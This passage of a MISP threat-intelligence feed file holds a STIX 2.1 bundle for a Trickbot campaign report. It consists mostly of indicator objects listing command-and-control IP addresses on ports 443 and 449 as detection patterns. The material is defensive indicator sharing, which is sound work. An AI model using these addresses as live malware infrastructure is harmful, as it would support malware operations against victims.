adulau/misp-circl-feed
1
0
Fork 0
Code Issues 1 Pull requests Projects 1 Releases Packages Wiki Activity Actions
misp-circl-feed/feeds/circl/stix-2.1/5e70a28a-d97c-47f6-a229-40990a0a020f.json

1354 lines
774 KiB
JSON
Raw Normal View History

chg: [misp-stix] STIX 2.1 export added
2023-04-21 14:44:17 +00:00
{
"type": "bundle",
"id": "bundle--5e70a28a-d97c-47f6-a229-40990a0a020f",
"objects": [
{
"type": "identity",
"spec_version": "2.1",
"id": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2021-05-24T10:05:33.000Z",
"modified": "2021-05-24T10:05:33.000Z",
"name": "laskowski-tech.com",
"identity_class": "organization"
},
{
"type": "report",
"spec_version": "2.1",
"id": "report--5e70a28a-d97c-47f6-a229-40990a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2021-05-24T10:05:33.000Z",
"modified": "2021-05-24T10:05:33.000Z",
"name": "Trickbot Gtag lib693/tt0002",
"published": "2020-07-03T03:59:42Z",
"object_refs": [
"indicator--5e70a5f0-6724-42d1-98b0-446f74656a8a",
"indicator--5e70a5f2-aab8-402e-b421-4bd074656a8a",
"indicator--5e70a5f2-c5d8-4878-819f-42e974656a8a",
"indicator--5e70a5f2-6fb8-49f1-857e-48e574656a8a",
"indicator--5e70a5f2-c5c0-4f9c-a390-44d174656a8a",
"indicator--5e70a5f2-f7e4-4282-8d69-47a274656a8a",
"indicator--5e70a5f2-6578-48eb-84a0-45c174656a8a",
"indicator--5e70a5f2-d5ac-4066-845e-4bec74656a8a",
"indicator--5e70a5f2-a65c-4298-ab55-47e974656a8a",
"indicator--5e70a5f2-4374-4583-a321-4c2774656a8a",
"indicator--5e70a5f2-f674-43e8-8460-4a2474656a8a",
"indicator--5e70a5f2-10a0-4465-b424-4a3074656a8a",
"indicator--5e70a5f2-4550-4d05-91e0-497974656a8a",
"indicator--5e70a5f2-0f94-4075-9550-4a7074656a8a",
"indicator--5e70a5f2-52b8-4639-8568-4ad274656a8a",
"indicator--5e70a5f2-8da8-47cf-ada7-4d7274656a8a",
"indicator--5e70a5f2-6490-4fde-b15b-4fe274656a8a",
"indicator--5e70a5f2-e478-43e0-8336-4fe074656a8a",
"indicator--5e70a5f2-020c-4fbf-b4a0-488a74656a8a",
"indicator--5e70a5f2-f38c-4dd9-a3f9-4b3374656a8a",
"indicator--5e70a5f2-860c-47fb-8aa8-4d6574656a8a",
"indicator--5e70a5f2-2780-4a1d-87ac-480874656a8a",
"indicator--5e70a5f2-b0fc-481b-86f6-4de574656a8a",
"indicator--5e70a5f2-7d68-425d-82d6-45a674656a8a",
"indicator--5e70a5f2-059c-4637-b10d-4cdf74656a8a",
"indicator--5e70a5f2-c28c-46bf-b7fb-493874656a8a",
"indicator--5e70a5f2-fd44-4949-80c1-434174656a8a",
"indicator--5e70a5f2-a5e4-4e3e-bb6f-457d74656a8a",
"indicator--5e70a5f2-15fc-44b3-bd10-4a6a74656a8a",
"indicator--5e70a5f2-91b0-4aa1-920b-4b2974656a8a",
"indicator--5e70a5f2-498c-40f6-8ef1-46e874656a8a",
"indicator--5e70a5f2-f290-41ad-9ab3-461674656a8a",
"indicator--5e70a5f2-c434-4f05-9cc8-4f5574656a8a",
"indicator--5e70a5f2-b7d4-48c7-9f26-49e274656a8a",
"indicator--5e70a5f2-e7e4-4dba-b99d-4eb374656a8a",
"indicator--5e70a5f2-549c-470e-a6de-465f74656a8a",
"indicator--5e70a5f2-1278-4b1b-8bb6-40f874656a8a",
"indicator--5e70a5f2-c438-4004-88c9-495a74656a8a",
"indicator--5e70a5f2-9a68-4b61-b682-4f4674656a8a",
"indicator--5e70a685-4150-4cad-be79-4eb70a0a020f",
"x-misp-attribute--5e70a70a-34cc-4e93-9307-46120a0a020f",
"indicator--5e70a89e-79d0-4f1c-a597-4cf50a0a020f",
"x-misp-attribute--5e70a908-11b4-4fcd-a31c-4b380a0a020f",
"x-misp-attribute--5e70a91c-ba40-44f8-a6a4-4b360a0a020f",
"x-misp-attribute--5e70a964-6484-4ac5-a73b-40b40a0a020f",
"x-misp-attribute--5e70a99c-07a4-4eae-8027-421b0a0a020f",
"x-misp-attribute--5e70a9c8-27d8-4d27-a2c6-43b00a0a020f",
"observed-data--5e70b073-671c-4c61-97c4-4ab90a0a020f",
"url--5e70b073-671c-4c61-97c4-4ab90a0a020f",
"indicator--5e70a31f-5d70-41f2-9914-45110a0a020f",
"indicator--5e70a382-87ec-4e10-a667-4bfa0a0a020f",
"indicator--5e70a3c0-8c80-4209-9e58-4d240a0a020f"
],
"labels": [
"Threat-Report",
"misp:tool=\"MISP-STIX-Converter\"",
"Cobalt Strike",
"trickbot",
"misp-galaxy:malpedia=\"TrickBot\""
],
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a5f0-6724-42d1-98b0-446f74656a8a",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:27:51.000Z",
"modified": "2020-03-17T10:27:51.000Z",
"description": "On port 443",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '5.182.210.226' AND network-traffic:dst_port = '443']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:27:51Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"kill-chain:Command and Control",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a5f2-aab8-402e-b421-4bd074656a8a",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:27:50.000Z",
"modified": "2020-03-17T10:27:50.000Z",
"description": "On port 443",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '192.210.226.106' AND network-traffic:dst_port = '443']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:27:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"kill-chain:Command and Control",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a5f2-c5d8-4878-819f-42e974656a8a",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:27:50.000Z",
"modified": "2020-03-17T10:27:50.000Z",
"description": "On port 443",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '51.254.164.244' AND network-traffic:dst_port = '443']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:27:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"kill-chain:Command and Control",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a5f2-6fb8-49f1-857e-48e574656a8a",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:27:50.000Z",
"modified": "2020-03-17T10:27:50.000Z",
"description": "On port 443",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '45.148.120.153' AND network-traffic:dst_port = '443']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:27:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"kill-chain:Command and Control",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a5f2-c5c0-4f9c-a390-44d174656a8a",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:27:50.000Z",
"modified": "2020-03-17T10:27:50.000Z",
"description": "On port 443",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '195.123.239.67' AND network-traffic:dst_port = '443']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:27:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"kill-chain:Command and Control",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a5f2-f7e4-4282-8d69-47a274656a8a",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:27:50.000Z",
"modified": "2020-03-17T10:27:50.000Z",
"description": "On port 443",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '194.5.250.150' AND network-traffic:dst_port = '443']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:27:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"kill-chain:Command and Control",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a5f2-6578-48eb-84a0-45c174656a8a",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:27:50.000Z",
"modified": "2020-03-17T10:27:50.000Z",
"description": "On port 443",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '217.12.209.200' AND network-traffic:dst_port = '443']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:27:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"kill-chain:Command and Control",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a5f2-d5ac-4066-845e-4bec74656a8a",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:27:50.000Z",
"modified": "2020-03-17T10:27:50.000Z",
"description": "On port 443",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '185.99.2.221' AND network-traffic:dst_port = '443']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:27:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"kill-chain:Command and Control",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a5f2-a65c-4298-ab55-47e974656a8a",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:27:50.000Z",
"modified": "2020-03-17T10:27:50.000Z",
"description": "On port 443",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '51.254.164.245' AND network-traffic:dst_port = '443']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:27:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"kill-chain:Command and Control",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a5f2-4374-4583-a321-4c2774656a8a",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:27:50.000Z",
"modified": "2020-03-17T10:27:50.000Z",
"description": "On port 443",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '185.62.188.159' AND network-traffic:dst_port = '443']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:27:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"kill-chain:Command and Control",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a5f2-f674-43e8-8460-4a2474656a8a",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:27:50.000Z",
"modified": "2020-03-17T10:27:50.000Z",
"description": "On port 443",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '46.17.107.65' AND network-traffic:dst_port = '443']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:27:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"kill-chain:Command and Control",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a5f2-10a0-4465-b424-4a3074656a8a",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:27:50.000Z",
"modified": "2020-03-17T10:27:50.000Z",
"description": "On port 443",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '185.20.185.76' AND network-traffic:dst_port = '443']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:27:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"kill-chain:Command and Control",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a5f2-4550-4d05-91e0-497974656a8a",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:27:50.000Z",
"modified": "2020-03-17T10:27:50.000Z",
"description": "On port 443",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '185.203.118.37' AND network-traffic:dst_port = '443']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:27:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"kill-chain:Command and Control",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a5f2-0f94-4075-9550-4a7074656a8a",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:27:50.000Z",
"modified": "2020-03-17T10:27:50.000Z",
"description": "On port 443",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '146.185.253.178' AND network-traffic:dst_port = '443']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:27:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"kill-chain:Command and Control",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a5f2-52b8-4639-8568-4ad274656a8a",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:27:50.000Z",
"modified": "2020-03-17T10:27:50.000Z",
"description": "On port 443",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '185.14.31.252' AND network-traffic:dst_port = '443']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:27:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"kill-chain:Command and Control",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a5f2-8da8-47cf-ada7-4d7274656a8a",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:27:50.000Z",
"modified": "2020-03-17T10:27:50.000Z",
"description": "On port 443",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '185.99.2.115' AND network-traffic:dst_port = '443']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:27:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"kill-chain:Command and Control",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a5f2-6490-4fde-b15b-4fe274656a8a",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:27:50.000Z",
"modified": "2020-03-17T10:27:50.000Z",
"description": "On port 443",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '172.245.156.138' AND network-traffic:dst_port = '443']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:27:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"kill-chain:Command and Control",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a5f2-e478-43e0-8336-4fe074656a8a",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:27:51.000Z",
"modified": "2020-03-17T10:27:51.000Z",
"description": "On port 443",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '51.89.73.158' AND network-traffic:dst_port = '443']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:27:51Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"kill-chain:Command and Control",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a5f2-020c-4fbf-b4a0-488a74656a8a",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:27:50.000Z",
"modified": "2020-03-17T10:27:50.000Z",
"description": "On port 449",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '190.214.13.2' AND network-traffic:dst_port = '449']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:27:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"kill-chain:Command and Control",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a5f2-f38c-4dd9-a3f9-4b3374656a8a",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:27:50.000Z",
"modified": "2020-03-17T10:27:50.000Z",
"description": "On port 449",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '181.140.173.186' AND network-traffic:dst_port = '449']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:27:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"kill-chain:Command and Control",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a5f2-860c-47fb-8aa8-4d6574656a8a",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:27:50.000Z",
"modified": "2020-03-17T10:27:50.000Z",
"description": "On port 449",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '181.129.104.139' AND network-traffic:dst_port = '449']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:27:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"kill-chain:Command and Control",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a5f2-2780-4a1d-87ac-480874656a8a",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:27:50.000Z",
"modified": "2020-03-17T10:27:50.000Z",
"description": "On port 449",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '181.113.28.146' AND network-traffic:dst_port = '449']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:27:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"kill-chain:Command and Control",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a5f2-b0fc-481b-86f6-4de574656a8a",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:27:50.000Z",
"modified": "2020-03-17T10:27:50.000Z",
"description": "On port 449",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '181.112.157.42' AND network-traffic:dst_port = '449']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:27:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"kill-chain:Command and Control",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a5f2-7d68-425d-82d6-45a674656a8a",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:27:50.000Z",
"modified": "2020-03-17T10:27:50.000Z",
"description": "On port 449",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '170.84.78.224' AND network-traffic:dst_port = '449']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:27:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"kill-chain:Command and Control",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a5f2-059c-4637-b10d-4cdf74656a8a",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:27:50.000Z",
"modified": "2020-03-17T10:27:50.000Z",
"description": "On port 449",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '200.21.51.38' AND network-traffic:dst_port = '449']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:27:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"kill-chain:Command and Control",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a5f2-c28c-46bf-b7fb-493874656a8a",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:27:50.000Z",
"modified": "2020-03-17T10:27:50.000Z",
"description": "On port 449",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '46.174.235.36' AND network-traffic:dst_port = '449']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:27:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"kill-chain:Command and Control",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a5f2-fd44-4949-80c1-434174656a8a",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:27:50.000Z",
"modified": "2020-03-17T10:27:50.000Z",
"description": "On port 449",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '36.89.85.103' AND network-traffic:dst_port = '449']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:27:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"kill-chain:Command and Control",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a5f2-a5e4-4e3e-bb6f-457d74656a8a",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:27:50.000Z",
"modified": "2020-03-17T10:27:50.000Z",
"description": "On port 449",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '181.129.134.18' AND network-traffic:dst_port = '449']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:27:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"kill-chain:Command and Control",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a5f2-15fc-44b3-bd10-4a6a74656a8a",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:27:50.000Z",
"modified": "2020-03-17T10:27:50.000Z",
"description": "On port 449",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '186.71.150.23' AND network-traffic:dst_port = '449']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:27:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"kill-chain:Command and Control",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a5f2-91b0-4aa1-920b-4b2974656a8a",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:27:50.000Z",
"modified": "2020-03-17T10:27:50.000Z",
"description": "On port 449",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '131.161.253.190' AND network-traffic:dst_port = '449']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:27:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"kill-chain:Command and Control",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a5f2-498c-40f6-8ef1-46e874656a8a",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:27:50.000Z",
"modified": "2020-03-17T10:27:50.000Z",
"description": "On port 449",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '200.127.121.99' AND network-traffic:dst_port = '449']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:27:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
